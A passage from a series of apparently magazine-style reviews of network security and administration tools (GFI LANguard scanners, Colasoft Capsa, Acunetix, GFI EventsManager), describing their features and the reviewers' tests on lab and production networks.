You can either let the scanner automatically install whatever patches and service packs it finds missing or you can vet and release patches you want to allow. This will let you block the next release of Internet Explorer, for example, while allowing other critical patches through. You can also uninstall patches and service packs from here.

As in Version 8, you can also deploy custom software to a single machine or across your estate. In a nutshell, if it is executable or can be opened then you can deploy it. As a test we pushed a picture of a pair of cute kittens to a remote machine where the resident graphics program popped open to display them. You can install software just as easily provided the install needs no user intervention:

reviews-gfi-languard-v9-5

reviews-gfi-languard-v9-6

Alerts and Reporting

This is where GFI demonstrates it is serious about positioning this product as a robust and reliable enterprise-ready solution.

Firstly the scanner can email you the results of its nocturnal activities so all you have to do each morning is make yourself a coffee and check your inbox. We'd have liked to see this area expanded, perhaps with definable events that could trigger an SMS message, SNMP trap or a defined executable. Maybe in Version 10?

To convince your manager of the wisdom of your investment there is a good range of coloured charts and if you have the GFI report Manager framework the product slots right into that so you can generate detailed custom reports from the back-end database.

reviews-gfi-languard-v9-7

And speaking of the database, GFI has now provided maintenance options so you can schedule backups and perform management tasks from within the scanner itself; a good idea for a key application.

Subscribe to what?

A vulnerability scanner is only any good, of course, if it can be automatically updated with the latest exploits as they come out. GFI has changed the business model with Version 9, so you'll be expected to shell out a modest annual fee for a Software Maintenance Agreement (SMA) unlike Version 8 where you paid in full and updates were free thereafter.

A nag screen reminds you when your subscription runs out so you needn't worry about not noticing:

reviews-gfi-languard-v9-8

Conclusion

What more can we say? If you have an estate of Windows machines to secure and maintain then this is what you have been looking for. It does everything you might need and more, it's easy to use and delivers real-world benefits.

  • Hits: 20129

Colasoft Capsa v7.2.1 Network Analyser Review

Using network analysing software, we are able to monitor our network and dig into the various protocols to see what's happening in real time. This can help us understand much better the theoretical knowledge we've obtained throughout the years but, most importantly, help us identify, troubleshoot and fix network issues that we wouldn't be able to do otherwise.

A quick search on the Internet will surely reveal many network analysers available making it very confusing to select one. Some network analysers provide basic functions, such as packet sniffing, making them ideal for simple tasks while others give you all the necessary tools and functions to ensure your job is done the best possible way.

Colasoft's network analyser is a product that falls in the second category. We had the chance to test drive the Colasoft Network Analyser v7.2.1 which is the latest available version at the time of writing.

Having used previous versions of Colasoft's network analyser, this latest version we tested left us impressed and does, in fact, promise a lot no matter what the environment demands.

The Software

Colasoft's Capsa network analyser is available as a demo version directly from their website www.colasoft.com. We quickly downloaded the 21.8mb file and began the installation which was a breeze. Being small and compact meant the whole process didn't take more than 30-40 seconds.

We fired up the software, entered our registration details, activated our software and up came the first screen which shows a completely different philosophy to what we have been used to:

reviews-colasoft-1

Before you even start capturing packets and analysing your network, you're greeted with a first screen that allows you to select the network adaptor to be used for the session, while allowing you to choose from a number of preset profiles regarding your network bandwidth (1000, 100, 10 or 2 Mbps).

Next, you can select the type of analysis you need to run for this session ranging from Full analysis, Traffic Monitoring, Security analysis to HTTP, Email, DNS and FTP analysis. The concept of pre-configuring your packet capturing session is revolutionary and very impressive. Once the analysis profile is selected, the appropriate plug-in modules are automatically loaded to provide all necessary information.

For our review, we selected the ‘100Mb Network’ profile and ‘Full Analysis’ profile, providing access to all plug-in modules, which include ARP/RARP, DNS, Email, FTP, HTTP and ICMPv4 – more than enough to get any job done!

Optionally, you can use the ‘Packet Filter Settings’ section to apply filters to the packets that will be captured:

reviews-colasoft-2

The Main Dashboard

As soon as the program loaded its main interface, we were left surprised with the wealth of information and options provided.

The interface is broken into four sections: tool bar, node explorer, dashboard and online resource. The node explorer (left lower side) and online resource (right lower side) section can be removed, providing the dashboard with the maximum possible space to view all information related to our session.

reviews-colasoft-3

The menu provided allows the configuration of the program, plus access to four additional tools: Ping, Packet Player, Packet Builder and MAC Scanner.

To uncover the full capabilities of the Colasoft Capsa Network Analyser, we decided to proceed with the review by breaking down each of the four sections.

The ToolBar

The toolbar is populated with a number of options and tools that proved extremely useful and are easily accessible. As shown below, it too is broken into smaller sections allowing you to control the start - stop function of your capturing session, filters, network profile settings from where you can set your bandwidth settings, profile name, alarms and much more.

reviews-colasoft-4

The Analysis section is populated with some great features we haven't found in other similar tools. Here, you can enable or disable the built-in ‘diagnosis settings’ for over 35 different protocols and tcp/udp states.

reviews-colasoft-5

When selecting a diagnosis setting, Colasoft Capsa will automatically explain, in the right window, what the setting shows and the impact on the network. When done, click on the OK button and you're back to the main capturing screen.

The Analysis section also allows you to change the buffer size in case you want to capture packets for an extended period of time and, even better, you can enable the ‘auto packet saving’ feature which will automatically save all captured packets to your hard drive, making them available whenever you need them.

Right next to the analysis section is the 'Network Utilisation' and 'pps' (packets per second) gauges, followed by the 'Traffic History Chart'. These nifty gauges will show you in almost realtime the utilisation of your network card according to the network profile you selected before, plus any filters that might have been selected.

For example, if a 100Mbps network profile was selected, the gauges will represent the utilisation of a 100Mbps network card. If, in addition, filters were selected e.g. HTTP, then both gauges will represent a 100Mbps network utilisation only for the HTTP protocol. So if there were a large email or FTP download, it wouldn't register at the gauges as they will only show utilisation for HTTP traffic, according to the filter.

To give the gauges a try, we disabled all filters and started a 1.4Gig file transfer between our test bed and server, over our 100Mbps network. Utilisation hit the red areas while the pps remained at around 13,000 packets per second.

reviews-colasoft-6

The gauges are almost realtime as they are updated once every second, though we would have loved to see them swinging left-right in real time. One issue we encountered was that the 'Traffic History Chart' seemed to chop off the bandwidth value when moving our cursor toward the top of the graph. This is evident in our screenshot where the value shown is 80.8Mbps, and makes it almost impossible to use the history chart when your bandwidth is almost 100% utilised. We hope to see this fixed in the next version.

At the very end of the toolbar, the 'Packet Buffer' provides visual feedback on how full the buffer actually is, plus there are a few options to control the packet buffer for that session.

Node Explorer & DashBoard

On the lower left area we'll find the 'Node Explorer' which works in conjunction with the main dashboard to provide the information of our captured session. The Node Explorer is actually a very smart concept as it allows you to instantly filter information captured.

The Node Explorer starts populating the segmented areas automatically as it captures packets on the network. It provides a nice break-down of the information using a hierarchical approach that also follows the OSI model.

As we noticed, we could choose to select the Physical Explorer that contained nodes with MAC Addresses, or select the IP Explorer to view information about nodes based on their IP Address.

Each of these sections are then further broken down as shown. A nice simple and effective way to categorise the information and help the user find what is needed without searching through all captured packets.

Once we made a selection (Protocol Explorer/Ethernet II/IP (5) as shown below, the dashboard next to it provided up to 13 tabs of information which are analysed in the next screenshot.

reviews-colasoft-7

Selecting the IP Tab, the protocol tab in the main dashboard provided a wealth of information and we were quickly able to view the quantity of packets, type of traffic, amount of traffic and other critical information for the duration of our session.

We identified our Cisco Call Manager Express music-on-hold streaming under the UDP/SCCP, which consumes almost 88Kbps of bandwidth, an SNMP session which monitors a remote router accounting for 696bps of traffic, and lastly the ICMP tracking of our website, costing us another 1.616Kbps of traffic. All together, 89.512Kpbs.

reviews-colasoft-8

This information is automatically updated every second and you can customise the refresh rate from 10 presets. One function we really loved was the fact we could double-click on any of the shown protocols and another window would pop up with all packets captured for the selected protocol.

We double-clicked on the OSPF protocol (second last line in the above screenshot) to view all packets related to that protocol and here is what we got:

reviews-colasoft-9

Clearly there is no need to use filters as we would probably need to in other similar type of software, thanks to the smart design of the Node Explorer and Dashboard. Keep in mind that if we need to have all packets saved, we will need the appropriate buffer, otherwise the buffer is recycled as expected.

Going back to the main area, any user will realise that the dashboard area is where Colasoft's Capsa truly excels and unleashes its potential. The area is smartly broken into a tabbed interface and each tab does its own magic:

reviews-colasoft-10

The user can quickly switch between any tabs and obtain the information needed without disrupting the flow of packets captured.

Let's take a quick look at what each tab offers:

Summary Tab

The Summary tab is an overview of what the network analyser 'sees' on the network.

reviews-colasoft-11

We get brief statistics on the total amount of traffic we've seen, regardless of whether it’s been captured or not, the current network utilisation, bits per second and packets per second, plus a breakdown of the packet sizes we've seen so far. Handy information if you want to optimise your network according to your network packet size distribution.

Diagnosis Tab

The Diagnosis tab is truly a goldmine. Here you'll see all the information that related to problems automatically detected by Colasoft Capsa without additional effort!

This amazing section is broken up into the Application layer, Transport layer and Network layer (not shown). Capsa will break down each layer in a readable manner and show all related issues it has detected.

reviews-colasoft-12

Once a selection has been made - in our example we choose the 'Application layer/ DNS Server Slow Response' - the lower area of the window brings up a summary of all related packets this issue was detected in.

Any engineer who spends hours trying to troubleshoot network issues will truly understand the power and usefulness of this feature.

Protocol Tab

The Protocol tab provides an overview and break-down of the IP protocols on the network, along with other useful information as shown previously in conjunction with the Node Explorer.

reviews-colasoft-13

Physical Endpoint Tab

The Physical Endpoint tab shows conversations from physical nodes (Mac Addresses). Each node expands and its IP Address is revealed to help track the traffic. Similar statistics regarding the traffic is also shown:

reviews-colasoft-14

As with previous tabs, when selecting a node the physical conversation window opens right below and shows the relevant conversations along with their duration and total traffic.

IP Endpoint Tab

The IP Endpoint tab offers similar information but on the IP Layer. It shows all local and Internet IP addresses captured along with statistics such as number of packets, total bytes received, packets per second and more.

reviews-colasoft-15

When selecting an IP Address, Capsa will show all IP, TCP and UDP conversations captured for this host.

IP Conversation Tab

The IP Conversation tab will be useful to many engineers. It allows the tracking of conversations between endpoints on your network, assuming all traffic passes through the workstation where the Capsa Network Analyser is installed.

The tab will show individual sessions between endpoints, duration, bytes in and out from each end plus a lot more.

reviews-colasoft-16

Network engineers can use this area to troubleshoot problematic sessions between workstations, servers and connections toward the Internet. Clicking on a specific conversation will show all TCP and UDP conversations between the hosts, allowing further analysis.

Matrix Tab

The Matrix tab is an excellent function probably only found on Colasoft's Capsa. The matrix shows a graphical representation of all conversations captured throughout the session. It allows the monitoring of endpoint conversations and will automatically resolve endpoints when possible.

reviews-colasoft-17

Placing the mouse over a string causes Capsa to automatically show all relevant information about conversations between the two hosts. Active conversations are highlighted in green, multicast sessions in red and selected session in orange.

The menu on the left allows more options so an engineer can customise the information.

Packet Tab

The Packet tab gives access to the packets captured on the network. The user is able to lock the automatic scrolling or release it so new packets are shown as they are captured or have the program continue capturing packets without scrolling the packet window. This allows ease of access to any older packet without the need to scroll back for every new packet captured.

Even though the refresh time is customisable, the fastest refresh rate was only every 1 second. We would prefer a 'realtime' refresh rate and hope to see this implemented in the next update.

reviews-colasoft-18

Log Tab

The Log tab offers information on sessions related to specific protocols such as DNS, Email, FTP and HTTP. It's a good option to have, but we found little value in it since all other features of the program fully cover the information provided by the Log tab.

reviews-colasoft-19

 

Report Tab

The report tab is yet another useful feature of Colasoft's Capsa. It will allow the generation of a network report with all the captured packets and can be customised to a good extent. The program allows the engineer to insert a company logo and name, plus customise a few more fields.

The options provided in the report are quite a few, the most important being the Diagnosis and Protocol statistics.

reviews-colasoft-20

Finally, the report can be exported to PDF or HTML format to distribute it accordingly.

Professionals can use this report to provide evidence of their findings to their customers, making the job look more professional and saving hours of work.

Online Resource

The 'Online Resource' section is a great resource to help the engineer get the most out of the program. It contains links and live demos that show how to detect ARP poisoning attacks, ARP Flooding, how to monitor network traffic efficiently, track down BitTorrents and much more.

Once the user becomes familiar with the software they can select to close this section, giving its space to the rest of the program.

Final Conclusion

Colasoft's Capsa Network Analyser is without doubt a goldmine. It offers numerous enhancements that make it pleasant to work with and easy for anyone to find the information they need. Its unique functions such as the Diagnosis, Matrix and Reports surely make it stand out and can be invaluable for anyone troubleshooting network errors.

While the program is outstanding, it can do with some minor enhancements such as the real-time presentation of packets, more thorough network reports and improvement of the traffic history chart. Future updates will also need to include a 10Gbit option amongst the available network profies.

We would definitely advise any network administrator or engineer to give it a try and see for themselves how great a tool like Capsa can be.

  • Hits: 24167

GFI Languard Network Security Scanner V8

Can something really good get better? That was the question that faced us when we were assigned to review GFI's Languard Network Security Scanner, Version 8 , already well loved (and glowingly reviewed) at Version 5.

All vulnerability scanners for Windows environments fulfil the same basic function, but as the old saying goes “It's not what you do; it's the way that you do it”. GFI have kept all the good points from their previous releases and built on them; and the result is a tool that does everything you would want with an excellent user interface that is both task efficient and a real pleasure to use.

Installation

Visit GFI's website and you can download a fully-functional version that you can try before you buy; for ten days if you prefer to remain anonymous or for thirty days if you swap your details for an evaluation code. The download is 32Mb expanding to 125Mb on your disk when installed.

Installation is straightforward. All the software needs is an account to run under, details of its back-end database and a location to reside. MS Access, MSDE or MS SQL Server databases are supported and you can even migrate your data from one to another if needs be.

First of all, if you have a license key you can enter it during installation to save time later – just a little thing, but it shows this software has been designed in a very logical manner.

You're then asked for an account to run the Attendant service, the first of the Version 8 enhancements. This, as its name suggests, is a Windows service that sits in your system tray and allows you easy access to the program and its documentation plus a handy window that lets you see everything the scanner is doing as it works away in the background.

reviews-gfi-languard-v8-1

After this you're asked whether you'd like your scan results stored in Microsoft Access or SQL Server (2000 or higher). This is another nice feature, particularly if you're using the tool to audit, patch and secure an entire infrastructure.

One feature we really liked is the ability to run unattended scheduled scans and email the results. This is a feature you won't find in any other similar product.

GFI's LANguard scanner doesn't just find vulnerabilities, it will also download the updates that fix them and patch your machines for you.

Finally, you can tell the software where to install itself and sit back while the installation completes.

Getting Started

Each time you start the scanner it checks with GFI for more recent versions and for updated vulnerabilities and patches. You can turn this off if you don't always have internet access.

You'll also get a wizard to walk you through the most common scanning tasks. This is great for new users and again you can turn it off once you become familiar with the product.

reviews-gfi-languard-v8-2

The Interface

Everything takes place in one uncluttered main screen as shown below. As our first review task we closed the wizard and simply ‘had a go' without having read a single line of documentation. It's a testament to the good design of the interface that within a few mouse clicks we were scanning our first test system without any problems.

reviews-gfi-languard-v8-3

The left hand pane contains the tools, menus and options available to you. This is split over three tabs, an improvement over Version 5 where everything sat in one huge list. To the right of this are two panes that display the information or settings relating to the option you've chosen, and the results the product has obtained. Below them is a results pane that shows what the scanner is up to, tabbed again to let you view the three scanner threads or the overall network discovery.

Performance and Results

It's fast. While performance obviously depends on your system and network we were pleasantly surprised by the efficiency and speed of the scan.

Speed is nothing however without results, and the product doesn't disappoint. Results are logically presented as an expanding tree beneath an entry for each scanned machine. Select one of the areas in the left pane and you'll get the detail in the right pane. Right-click there and you can take appropriate action; in the example shown right-clicking will attempt a connection on that port:

reviews-gfi-languard-v8-4

Vulnerabilities are similarly presented with rich and helpful descriptions, while references for further information from Microsoft and others plus the ability to deploy the relevant patches are just a right-click away:

reviews-gfi-languard-v8-5

The scanner is also surprisingly resilient. We decided to be mean and ran a scan of a desktop PC on a large network – via a VPN tunnel within a VPN tunnel across the public internet with an 11Mb/s wireless LAN connection on the other end. The scan took about ten minutes but completed fine.

Patch Deployment

Finding vulnerabilities is only half the story; this product will also help you fix them. One click at the machine level of the scan results opens yet another helpful screen that gathers all your options in one place. You can elect to remotely patch the errant machine, shut it down or even berate the operator, and a particularly nice touch is the list of your top five most pressing problems:

reviews-gfi-languard-v8-6

Patch deployment is similarly intuitive. The product can download the required patches for you, either now or at a scheduled time, and can access files already downloaded by a WSUS server if you have one. Once you have the files available you can patch now or schedule the deployment, and either way installation is automatic.

Alongside this is another Version 8 feature which gives you access to the same mechanism to deploy and install software of your choice. We tested this by push-installing some freeware tools, but all you need is a fully scripted install for unattended installation and you can deploy anything you like out to your remote machines. This is where the Attendant Service comes in again as the tray application provides a neat log of what's scheduled and what's happened. The example shows how good the error reporting is (we deliberately supplied the wrong credentials):

reviews-gfi-languard-v8-7

This powerful feature is also remarkably configurable –you can specify where the copied files should go, check the OS before installation, change the user credentials (important for file system access and for push-installing the Patch Agent service), reboot afterwards or even seek user approval before going ahead. We've used other tools before for software deployment and we felt right at home with the facilities here.

Scripting and Tools

Another plus for the busy administrator is the facility to schedule scans to run when you'd rather be away doing something else. You can schedule a simple timed scan and have the results emailed to you, or you can set up repeating scans and have the product compare the current results with the previous and only alert you if something has changed. If you don't want your inbox battered you can sleep soundly knowing you can still consult the database next morning to review the results. And if you have mobile users your group scan (or patch) jobs can stay active until your last elusive road warrior has appeared on the network and been processed. Resistance is futile!

Under the Tools tab there are a few more goodies including an SNMP audit to find insecure community strings. This was the site of our only disappointment with the product – we would have liked the ability to write our own tools and add them in here, but it seemed we'd finally found something GFI hadn't thought of.

reviews-gfi-languard-v8-8

Having said that, all the other scripting and tweaking facilities you'd expect are there, including a comprehensive command-line interface for both scanning and patch deployment and the ability to write custom vulnerability definitions in VBScript. All this and more is adequately documented in the well-written on-line help and user manual, and if you're still stuck there's a link to GFI's knowledgebase from within the program itself.

Summary

We were really impressed by this product. GFI have done an excellent job here and produced a great tool, which combines vulnerability scanning and patch management , with heavyweight features and an excellent user interface that is a joy to work with.

  • Hits: 19760

Acunetix Web Vulnerability Scanner

The biggest problem with testing web applications is scalability. With the addition of even a single form or page to test, you invariably increase the number of repetitive tasks you have to perform and the number of relationships you have to analyze to figure out whether you can identify a security issue.

As such, performing a security assessment without automation is an exercise in stupidity. One can use the lofty argument of the individual skill of the tester, and this is not to be discounted – I’ll come back to it – but, essentially, you can automate at least 80% of the task of assessing website security. This is part of the reason that security testing is becoming highly commoditized, the more you have to scan, the more repetitive tasks you have to perform. It is virtually impossible for a tester to manually analyze each and every single variable that needs to be tested. Even if it were so, to perform this iterative assessment manually would be foolishly time-consuming.

This problem, coupled with the explosive growth of web applications for business critical applications, has resulted in a large array of web application security testing products. How do you choose a product that is accurate (false positives are a key concern), safe (we’re testing important apps), fast (we come back the complexity point) and perhaps most importantly, meaningful in its analysis?

This implies that its description of the vulnerabilities discovered, and the measures to be taken to mitigate them, must be crystal clear. This is essentially what you’re paying for, it doesn’t matter how good the scanning engine is or how detailed their threat database is if the output – risk description and mitigation – are not properly handled. With these points in mind, we at Firewallcx, decided to take Acunetix’s Web Vulnerability Scanner for a spin.

I’ve had the pleasure of watching the evolution of web scanning tools, right from my own early scripting in PERL, to the days of Nikto and libwhisker, to application proxies, protocol fuzzers and the like. At the outset, let me say that Acunetix’s product has been built by people who have understood this evolution. The designers of the product have been around the block and know exactly what a professional security tester needs in a tool like this. While this puppy will do point ’n’ shoot scanning with a wizard for newbies, it has all the little things that make it a perfect assistant to the manual tester.

A simple example of ‘the small stuff’ is the extremely handy encoder tool that can handle text conversions and hashing in a jiffy. Anyone who’s had the displeasure of having to whip up a base-64 decoder or resort to md5sum to obtain a hash in the middle of a test will appreciate why this is so useful. More importantly, it shows that the folks at Acunetix know that a good tester will be analyzing the results and tweaking the inputs away from what the scanning engine would do. Essentially they give you the leeway to plug your own intellect into the tool.

Usage is extremely straightforward, hit the icon and you’ll get a quick loading interface that looks professional and displays information smartly (I appreciate the tabbed interfaces, these things matter as a badly designed UI could overwhelm you with more information than you need). Here’s a shot of the target selection wizard:

reviews-acunetix-1

What I liked here was the ‘Optimize for the following technologies’ setup. Acunetix did a quick query of my target (our website, www.Firewall.cx) and identified PHP, mod_ssl, OpenSSL and FrontPage as modules that we’re using. When you’re going up against a blind target in a penetration test or setting up scans for 50 webapps at a time, this is something that you will really appreciate.

Next we come to the profile selection – which allows you to choose the scanning profile. Say I just want to look for SQL injection, I can pick that profile. You can use the profile editor to customize and choose your own checks. Standard stuff here. The profile and threat selection GUI is well categorized and it’s easy to find the checks you want to deselect or select.

reviews-acunetix-2

You can browse the threat database in detail as shown below:

reviews-acunetix-3

At around this juncture, the tool identified that www.Firewall.cx uses non-standard (non-404) error pages. This is extremely important for the tool to do. If it cannot determine the correct ‘page not found’ page, it will start throwing false positives on every single 302 redirect. This is a major problem with scanners such as Nikto and is not to be overlooked. Acunetix walked me through the identification of a valid 404 page. Perhaps a slightly more detailed explanation as to why this is important would benefit a newbie.

I had updated the tool before scanning, and saw the threat database being updated with some recent threats. I don’t know the threat update frequency, but the process was straightforward and, unlike many tools, didn’t require me to restart the tool with the new DB.

reviews-acunetix-4

Since I was more interested in the ‘how can I help myself’ as opposed to ‘how can you help me’ approach to scanning, I fiddled with the fuzzer, request generator and authentication tester. These are very robust implementations, we have fully fledged tools implementing just this functionality and you should not be surprised to see more people discarding other tools and using Acunetix as a one-stop-shop toolbox.

One note though, the usernames dictionary for the authentication tester is far too limited out of the box (3-4 usernames), the password list was reasonably large, but the tool should include a default username list (where are things like ‘tomcat’, ‘frontpage’ etc?) so as not to give people a false sense of security. Given that weak password authentication is still one of the top reasons for a security breach, this module could use a reworking. I would like to see something more tweakable, along the lines of Brutus or Hydra’s HTTP authentication capabilities. Perhaps the ability to plug in a third party bruteforce tool would be nice.

Here I am playing with the HTTP editor:

reviews-acunetix-5

Here’s the neat little encoder utility that I was talking about earlier. You will not miss this one in the middle of a detailed test:

reviews-acunetix-6

After being satisfied that this product could get me through the manual phase of my audits, I fell back on my tester’s laziness and hit the scan button while sipping a Red Bull.

The results arrive in real time and are browseable, which is far better than seeing a progress bar creep forward arbitrarily. While this may seem cosmetic, when you’re being pushed to deliver a report, you want to be able to keep testing manually in parallel. I was watching the results come in and using the HTTP editor to replicate the responses and judge what required my manual intervention.

Essentially, Acunetix chews through the application looking for potential flaws and lets you take over to verify them in parallel. This is absolutely the right approach and far more expensive tools that I’ve used do not realise this. Nobody with half smarts will rely purely on the output of a tool, a thorough audit will have the tester investigating concern areas on his own, if I have to wait for your tool to finish everything it does before I can even see those half-results, you’ve wasted my time.

Here’s how the scanning window looked:

reviews-acunetix-7

Now bear in mind that I was running this test over a 256kbps link on the Internet, I was expecting it to take time, especially given that Firewall.cx has an extremely large set of pages. Halfway through, I had to stop the test as it was bravely taking on the task of analyzing every single page in our forums. However, there was constant feedback through the activity window and my network interface, you don’t end up wondering whether the product has hung as is the case with many other products I’ve used.

The reporting features are pretty granular, allowing you to select the usual executive summary and detailed report options. Frankly, I like the way the results are presented and in the course of my audits never needed to generate a report from the tool itself. I’m certain that the features of the reporting module will more than suffice. The descriptions of the vulnerabilities are well written, the solutions are accurate and the links to more information come from authoritative sources. If you come back to what I said in the opening stages of this review, this is the most important information that a tool should look to provide. Nothing is more terrible than ambiguous results, and that is a problem you will not have with this product.

One drawback found with the product was the lack of a more complete scripting interface. Many testers would like the ability to add their own code to the scanning setup. I did check out the vulnerability editor feature, but would prefer something that gave me more flexibility. Another was the lack of a version for Linux / UNIX-like systems. The majority of security testers operate from these platforms and it would be nice not to have to switch to a virtual machine or deal with a dual boot configuration to be able to harness the power of this tool. Neither of these drawbacks are deal killers, and should be treated more as feature requests.

Other than that, I truly enjoyed using this product. Web application auditing can be a tedious and time consuming nightmare, and the best praise I can give Acunetix is that they’ve made a product that makes me feel a part of the test. The interactivity and levels of detail available to you give you the ability to be laid back or tinker with everything you want, while the test is still going on. With its features and reasonable pricing for a consultant’s license, this product is unmatched and will quickly become one of the premier tools in your arsenal.

  • Hits: 22324

GFI LANguard Network Security Scanner Version 5.0 Review

In the light of all the recent attacks that tend to focus on the vulnerabilities of Windows platforms, we were increasingly dissatisfied with the common vulnerability scanners that we usually employ. We wanted a tool that didn't just help find holes, but would help administer the systems, deploy patches, view account / password policies etc. In short, we were looking for a Windows specialist tool.

Sure, there's a number of very popular (and very expensive) commercial scanners out there. However, most of them are prohibitively priced for the networks we administrate and all of them fell short on the administrative front. We tested a previous version of LANguard and our initial impressions were good. Thus we decided to give their latest offering a spin.

Getting Started

Getting the tool was easy enough, a quick visit to GFI's intuitively laid out site, and a 10MB download later, we were set to go. We must mention that we're partial to tools that aren't too heavy on the disk-space. Sahir has started carrying around a toolkit on his cell-phone USB drive, where space is at a premium. 10MB is a reasonable size for a program with all the features of this one.

Installation was the usual Windows deal (Click <next> and see how quickly you can reach <finish>). We fired up the tool and was greeted with a splash screen that checked for a newer version, and downloaded new patch detection files, dictionaries, etc.

reviews-gfi-languard-1

We'd prefer to have the option of updating rather than having it happen every time at startup bu we couldn't find the option to change this behaviour; this is a minor point that GFI should add.

Interface

Once the program is fully updated, you're greeted with a slick interface that looks like it's been made in .Net. No low coloured icons and cluttered toolbars here. While some may consider this inconsequential, it's a pleasure to work on software that looks good. It gives it that final bit of polish that's needed for a professional package. You can see the main screen below.

reviews-gfi-languard-2

The left panel shows all the tools available and is like an ‘actions' pane. From here you can select the security scanner, filter your scan results in a variety of ways, access the tools (such as patch deployment, DNS lookup, traceroute, SNMP audit, SQL server audit etc) and the program configuration as well. In fact if you look under the menus at the top, you'll find very few options as just about everything can be controlled or modified from the left panel.

The right panel obviously shows you the results of the scan, or the tool / configuration section you have selected. In this case it's on the Security Scanner mode where we can quickly setup a target and scan it with a profile. A profile is a description of what you want to scan for, the built in profiles include:

  • Missing patches
  • CGI scanning
  • Only Web / Only SNMP
  • Ping them all
  • Share Finder
  • Trojan Ports
  • Full TCP & UDP port scan

In the Darkness, Scan ‘em...

We setup the default scanning profile and scanned our localhost (a mercilessly locked down XP box that resists spirited break-ins from our practice penetration tests). We scanned as the ‘currently logged on user' (an administrator account), which makes a difference, since you see a lot more when scanning with privileges than without. As we had expected, this box was fairly well locked down. Here is the view just after the scan finished:

reviews-gfi-languard-3

Clicking one of the filters in the left pane brings up a very nicely formatted report, showing you the information you requested (high vulnerabilities, low vulnerabilities, missing patches etc). Here is the full report:

reviews-gfi-languard-4

As you can see, it identified three open ports (no filtering was in place on the loopback interface) as well as MAC address, TTL, operating system etc.

We were not expecting much to show up on this highly-secured system, so we decided to wander further.

The Stakes Get Higher...

Target 2 is the ‘nightmare machine'. It is a box so insecure that it can only be run under VMWare with no connection to the Internet. What better place to set LANguard free than on a Windows XP box, completely unpatched, completely open? If it were setup on the ‘net it would go down within a couple of minutes!

However, this was not good enough for our rigorous requirements, so we infected the box with a healthy dose of Sasser. Hopefully we would be able to finish the scan before LSASS.exe crashed, taking the system down with it. To make life even more difficult, we didn't give LANguard the right credentials like we had before. In essence, this was a 'no privilege' scan.

reviews-gfi-languard-5

LANguard detected the no password administrator account, the Sasser backdoor, default sharing, Terminal Services active (we enabled it for the scenario). In short, it picked up on everything.

We purposely didn't give it any credentials as we wanted to test its patch deployment features last, since this was what we were really interested in. This was very impressive as more expensive scanners (notably Retina) missed out on a lot of things when given no credentials.

To further extend out scans, we though it would be a good idea to scan our VLAN network that contained over 250 Cisco IP Phones and two Cisco Call Managers. LANguard was able to scan all IP Phones without a problem and also gave us some interesting findings as shown in this screenshot:

reviews-gfi-languard-6

LANguard detected with ease the http port (80) open and also included a sample of the actual page that would be downloaded should a client connect to the target host!

It is quite important to note at this point that the scan shown above was performed without any disruptions to our Cisco VoIP network. Even though no vulnerabilities were detected, something we expected, we were pleased enough to see Languard capable of working in our Cisco VoIP network without problems.

If you can't join them …... Patch them!

Perhaps one of the most neatest features of GFI's LANguard is the patch management system, designed to automatically patch the systems you have previously scanned. The automatic patching system works quite well, but you should download the online PDF file that contains instructions on how to proceed should you decide to use this feature.

The automatic patching requires the host to be previously scanned in order to find all missing patches, service packs and other vulnerabilities. Once this phase is complete, you're ready to select the workstation(s) you would like to patch!

As expected, you need the appropriate credentials in order to successfully apply all selected patches, and for this reason there is a small field in which you can enter your credentials for the remote machine.

We started by selectively scanning two hosts in order to proceed patching one of them. The target host was 10.0.0.54, a Windows 2000 workstation that was missing a few patches:

reviews-gfi-languard-7

LANguard successfully detected the missing patches on the system as shown on the screenshot above, and we then proceeded to patch the system. A very useful feature is the ability to select the patch(es) you wish to install on the target machine.

reviews-gfi-languard-8

As suggested by LANguard, we downloaded the selected patch and pointed our program to install it on the remote machine. The screen shot above shows the patch we wanted to install, followed by the machine on which we selected to install it. At the top of the screen we needed to supply the appropriate credentials to allow LANguard to do its job, that is, a username of 'Administrator' and a password of ..... sorry - can't tell :)

Because most patches require a system reboot, LANguard includes such options, ensuring that no input at all is required on the other side for the patching to complete. Advanced options such as ‘Warn user before deployment' and ‘Delete copied files from remote computer after deployment', are there to help cover all your needs:

reviews-gfi-languard-9

The deployment status tab is another smart feature; it allows the administrator to view the patching in progress. It clearly shows all steps taken to deploy the patch and will report any errors encountered.

It is also worth noting that we tried making life more difficult by running the patch management system from our laptop, which was connected to the remote network via the Internet, and securing it using a Cisco VPN tunnel with the IPSec as the encryption protocol. Our expectations were that GFI's LANguard would fail terribly, giving us the green light to note a weak point of the program.

To our surprise, it seems like GFI's developers had already forseen such situations and the results were simply amazing, allowing us to successfully scan and patch a Windows 2000 workstation located on the end of the VPN tunnel!

Summary

GFI without doubt has created a product that most administrators and network engineers would swear by. It's efficient, fast and very stable, able to perform its job whether you're working on the local or remote LAN.

Its features are very helpful: you won't find many network scanners pointing you to web pages where you can find out all the information on discovered vulnerabilities, download the appropriate patches and apply them with a few simple clicks of a mouse!

We've tried LANguard from small networks with 5 to 10 hosts up to large corporate network with more than 380 hosts, over WAN links and Cisco VPN tunnels and it worked like a charm without creating problems such as network congestions. We are confident that you'll love this product's features and it will quickly become one of your most necessary programs.

  • Hits: 20568

GFI EventsManager 7 Review

Imagine having to trawl dutifully through the event logs of twenty or thirty servers every morning, trying to spot those few significant events that could mean real trouble among that avalanche of operational trivia. Now imagine being able to call up all those events from all your servers in a single browser window and, with one click, open an event category to display just those events you are interested in…

Sounds good? Install this product, and you’ve got it.

A product of the well-known GFI stables, EventsManager 7 replaces their earlier LANguard Security Event Log Monitor (S.E.L.M.) which is no longer available. There’s also a Reporting Suite to go with it; but we haven’t reviewed that here.

In a nutshell the product enables you to collect and archive event logs across your organisation, but there’s so much more to it than that. It’s hard to condense the possibilities into a review of this size, but what you actually get is:

  • Automatic, scheduled collection of event logs across the network; not only from Windows machines but from Linux/Unix servers too, and even from any network kit that can generate syslog output;
  • The ability to group your monitored machines into categories and to apply different logging criteria to each group;
  • One tool for looking at event logs everywhere. No more switching the event log viewer between servers and messing around with custom MMCs;
  • The ability to display events by category or interest type regardless of where they occurred (for example just the Active Directory replication events, just the system health events, just the successful log-on events outside normal working hours);
  • Automated response actions for particular events or types of events including alerting staff by email or pager or running an external script to deal with the problem;
  • A back-end database into which you can archive raw or filtered events and which you can search or analyse against – great for legal compliance and for forensic investigation.

You can download the software from GFI’s website and, in exchange for your details, they’ll give you a thirty-day evaluation key that unlocks all the features; plenty of time to decide if it’s right for you. This is useful, because you do need to think about the deployment.

